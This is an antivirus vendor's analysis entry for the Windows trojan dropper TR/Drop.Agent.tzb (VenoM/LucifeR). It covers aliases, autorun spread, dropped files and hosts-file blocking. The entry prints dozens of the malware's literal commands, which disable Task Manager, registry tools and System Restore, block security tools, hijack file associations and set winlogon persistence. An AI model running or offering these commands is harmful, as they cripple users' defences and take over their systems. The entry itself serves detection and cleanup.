Need help? Ask the community or hire an expert.
Go to Avira Answers
Virus:TR/Drop.Agent.tzb
Date discovered:29/12/2008
Type:Trojan
Subtype:Dropper
In the wild:Yes
Reported Infections:Low to medium
Distribution Potential:Low to medium
Damage Potential:Low to medium
Static file:Yes
File size:112.640 Bytes
MD5 checksum:46d5d944e89a3584f20583b3f2de51cb
VDF version:7.01.01.40
IVDF version:7.01.01.43 - Monday, December 29, 2008

 General Method of propagation:
   • Autorun feature


Aliases:
   •  Mcafee: W32/YahLover.worm.gen
   •  Sophos: W32/Autorun-BLY
   •  Bitdefender: Worm.Generic.52609
   •  Panda: W32/VenoMLucifer.A
   •  Eset: BAT/Autorun.B


Platforms / OS:
   • Windows 2000
   • Windows XP
   • Windows 2003


Side effects:
   • Blocks access to certain websites
   • Blocks access to security websites
   • Drops malicious files
   • Lowers security settings
   • Registry modification

 Files It copies itself to the following location:
   • %drive%\System Volume Information\LucifeR.exe



It overwrites a file.
%SYSDIR%\drivers\etc\hosts



The following files are created:

%drive%\AutoruN.inf This is a non malicious text file with the following content:
   • %code that runs malware%

%SYSDIR%\COM17949.DLL
%TEMPDIR%\bt38830.bat Further investigation pointed out that this file is malware, too. Detected as: BAT/Mevon.A




It tries to execute the following files:

– Filename:
   • cmd.exe /c %TEMPDIR%\bt38830.bat %executed file%


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFind /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced" /v Hidden /t reg_dword /d "2" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d "0" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoRecycleFiles /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoPropertiesMyComputer /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v DisallowRun /t reg_dword /d "1" /f


– Filename:
   • taskkill /f /im Ad-Watch.EXE


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "0" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Policies\Microsoft\windows NT\SystemRestore" /v DisableConfig /t reg_dword /d "1" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Policies\Microsoft\windows NT\SystemRestore" /v DisableSR /t reg_dword /d "1" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 1 /t reg_sz /d "notepad.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 2 /t reg_sz /d "HijackThis.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 3 /t reg_sz /d "wordpad.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 4 /t reg_sz /d "rstrui.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 5 /t reg_sz /d "taskmgr.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 5 /t reg_sz /d "msconfig.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 6 /t reg_sz /d "regedit.exe" /f


– Filename:
   • attrib +s +h "%HOME%\Application Data\Micro$oft\desktop.log"


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 7 /t reg_sz /d "HiJackThis_v2.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 10 /t reg_sz /d "cmd.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 11 /t reg_sz /d "ibprocman.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 12 /t reg_sz /d "explorer.exe" /f


– Filename:
   • reg add "HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\DisallowRun" /v 13 /t reg_sz /d "integrator.exe.exe" /f


– Filename:
   • find /i "metroflog" "%SYSDIR%\drivers\etc\hosts"


– Filename:
   • reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d "www.google.com.mx" /f


– Filename:
   • reg add "HKCU\VenoM.LucifeR.17949179491794917949\suriV" /v "Tu has sido derrotado de nuevo por VenoM" /d "Burn in Hell" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\GPEDIT.MSC" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\attrib.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • attrib -s -h -r -a %executed file%


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\cmd.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\command.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\del.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\Dxdiag.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\notepad.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\reg.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\regedit.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\taskkill.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\tskill.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\HELPCTR.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\Software\Microsoft\windows\CurrentVersion\Run" /v CTFMON.EXE /t reg_sz /d "%WINDIR%\svchost.exe" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\MSCONFIG.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\VenoM.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\wordpad.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\666.exe" /v "" /t reg_sz /d "%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com" /f


– Filename:
   • attrib +h +s C:\WINDOWS


– Filename:
   • attrib +s +h "%SYSDIR%"


– Filename:
   • attrib +s +h "%WINDIR%\notepad.exe"


– Filename:
   • attrib +s +h "%SYSDIR%\notepad.exe"


– Filename:
   • attrib +s +h +r +a %drive%\AutoruN.inf


– Filename:
   • attrib +s +h "%drive%\System Volume Information\*.exe"


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows NT\CurrentVersion\winlogon" /v Shell /t reg_sz /d "Explorer.exe %recycle bin%\NTDETECT.EXE" /f


– Filename:
   • attrib +s +h "%drive%\System Volume Information"


– Filename:
   • attrib -h -s -r -a %executed file%


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t reg_dword /d "1" /f


– Filename:
   • reg add "HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer" /v NoFind /t reg_dword /d "1" /f

 Registry The following registry keys are added:

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\666.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   MSCONFIG.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer]
   • "DisallowRun"=dword:0x00000001
   • "NoFind"=dword:0x00000001
   • "NoFolderOptions"=dword:0x00000001
   • "NoPropertiesMyComputer"=dword:0x00000001
   • "NoRecycleFiles"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   HELPCTR.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Policies\Microsoft\windows NT\SystemRestore]
   • "DisableConfig"=dword:0x00000001
   • "DisableSR"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   VenoM.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   GPEDIT.MSC]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   Dxdiag.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\VenoM.LucifeR.17949179491794917949\suriV]
   • "Tu has sido derrotado de nuevo por VenoM"="Burn in Hell"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   tskill.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System]
   • "DisableRegistryTools"=dword:0x00000001
   • "DisableTaskMgr"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\System]
   • "DisableRegistryTools"=dword:0x00000001
   • "DisableTaskMgr"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   taskkill.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   regedit.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   attrib.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer]
   • "NoFind"=dword:0x00000001
   • "NoFolderOptions"=dword:0x00000001

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\reg.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   command.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Policies\Explorer\
   DisallowRun]
   • "1"="notepad.exe"
   • "10"="cmd.exe"
   • "11"="ibprocman.exe"
   • "12"="explorer.exe"
   • "13"="integrator.exe.exe"
   • "2"="HijackThis.exe"
   • "3"="wordpad.exe"
   • "4"="rstrui.exe"
   • "5"="msconfig.exe"
   • "6"="regedit.exe"
   • "7"="HiJackThis_v2.exe"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   notepad.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\cmd.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\del.exe]
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\Software\Microsoft\windows\CurrentVersion\Run]
   • "CTFMON.EXE"="%WINDIR%\svchost.exe"



The following registry keys are changed:

– [HKLM\SOFTWARE\Classes\VBSFile\Shell\Open\Command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\inifile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\App Paths\
   wordpad.exe]
   New value:
   • "@"="%SYSDIR%\drivers\etc\Proceso inactivo del sistema.com"

– [HKLM\SOFTWARE\Classes\MSCFile\Shell\Open\Command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\JSFile\Shell\Open\Command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\piffile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\VBEFile\Shell\Open\Command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\inffile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\htmlfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKCU\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced]
   New value:
   • "Hidden"=dword:0x00000002
   • "HideFileExt"=dword:0x00000001
   • "ShowSuperHidden"=dword:0x00000000

– [HKLM\SOFTWARE\Microsoft\windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   New value:
   • "CheckedValue"=dword:0x00000000

– [HKLM\SOFTWARE\Microsoft\windows NT\CurrentVersion\winlogon]
   New value:
   • "Shell"="Explorer.exe %recycle bin%\NTDETECT.EXE"

– [HKLM\SOFTWARE\Classes\batfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKCU\Software\Microsoft\Internet Explorer\Main]
   New value:
   • "Start Page"="www.google.com.mx"

– [HKLM\SOFTWARE\Classes\cmdfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\regfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

– [HKLM\SOFTWARE\Classes\txtfile\shell\open\command]
   New value:
   • "@"="%SYSDIR%\mshta.exe "%userprofile%\Plantillas\Leviathan.hta""

 Hosts The host file is modified as explained:

– In this case already existing entries remain unmodified.

– Access to the following domains is effectively blocked:
   • 127.0.0.1 www.metroflog.com
   • 127.0.0.1 www.hotmail.com
   • 127.0.0.1 www.google.com


 Process termination The following process is terminated:
   • Ad-Watch.EXE


 File details Programming language:
The malware program was written in Delphi.


Runtime packer:
In order to aggravate detection and reduce size of the file it is packed with a runtime packer.

Description inserted by Petre Galan on Friday, February 25, 2011
Description updated by Petre Galan on Friday, February 25, 2011

Back . . . .